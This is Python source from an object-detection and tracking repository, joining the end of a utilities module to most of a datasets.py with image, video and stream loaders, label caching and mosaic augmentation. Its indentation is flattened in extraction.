print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def print_mutation(hyp, results, yaml_file='hyp_evolved.yaml', bucket=''):
# Print mutation results to evolve.txt (for use with train.py --evolve)
a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys
b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values
c = '%10.4g' * len(results) % results # results (P, R, [email protected], [email protected]:0.95, val_losses x 3)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
if bucket:
url = 'gs://%s/evolve.txt' % bucket
if gsutil_getsize(url) > (os.path.getsize('evolve.txt') if os.path.exists('evolve.txt') else 0):
os.system('gsutil cp %s .' % url) # download evolve.txt if larger than local
with open('evolve.txt', 'a') as f: # append result
f.write(c + b + '\n')
x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows
x = x[np.argsort(-fitness(x))] # sort
np.savetxt('evolve.txt', x, '%10.3g') # save sort by fitness
# Save yaml
for i, k in enumerate(hyp.keys()):
hyp[k] = float(x[0, i + 7])
with open(yaml_file, 'w') as f:
results = tuple(x[0, :7])
c = '%10.4g' * len(results) % results # results (P, R, [email protected], [email protected]:0.95, val_losses x 3)
f.write('# Hyperparameter Evolution Results\n# Generations: %g\n# Metrics: ' % len(x) + c + '\n\n')
yaml.dump(hyp, f, sort_keys=False)
if bucket:
os.system('gsutil cp evolve.txt %s gs://%s' % (yaml_file, bucket)) # upload
def apply_classifier(x, model, img, im0):
# applies a second stage classifier to yolo outputs
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for j, a in enumerate(d): # per item
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
# cv2.imwrite('test%i.jpg' % j, cutout)
im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
| 36,746 | Python | .py | 717 | 43.260809 | 121 | 0.566903 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,101 | datasets.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
import pickle
from copy import deepcopy
#from pycocotools import mask as maskUtils
from torchvision.utils import save_image
from torchvision.ops import roi_pool, roi_align, ps_roi_pool, ps_roi_align
from general import check_requirements, xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, \
resample_segments, clean_str
from ultralytics.utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
#print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:[email protected]/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
url = eval(s) if s.isnumeric() else s
if 'youtube.com/' in str(url) or 'youtu.be/' in str(url): # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
url = pafy.new(url).getbest(preftype="mp4").url
cap = cv2.VideoCapture(url)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {self.fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(1 / self.fps) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
#self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
#if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
# cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
if random.random() < 0.8:
img, labels = load_mosaic(self, index)
else:
img, labels = load_mosaic9(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
if random.random() < 0.8:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
else:
img2, labels2 = load_mosaic9(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
#img, labels = self.albumentations(img, labels)
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
if random.random() < hyp['paste_in']:
sample_labels, sample_images, sample_masks = [], [], []
while len(sample_labels) < 30:
sample_labels_, sample_images_, sample_masks_ = load_samples(self, random.randint(0, len(self.labels) - 1))
sample_labels += sample_labels_
sample_images += sample_images_
sample_masks += sample_masks_
#print(len(sample_labels))
if len(sample_labels) == 0:
break
labels = pastein(img, labels, sample_labels, sample_images, sample_masks)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
#img4, labels4, segments4 = remove_background(img4, labels4, segments4)
#sample_segments(img4, labels4, segments4, probability=self.hyp['copy_paste'])
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, probability=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
#img9, labels9, segments9 = remove_background(img9, labels9, segments9)
img9, labels9, segments9 = copy_paste(img9, labels9, segments9, probability=self.hyp['copy_paste'])
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
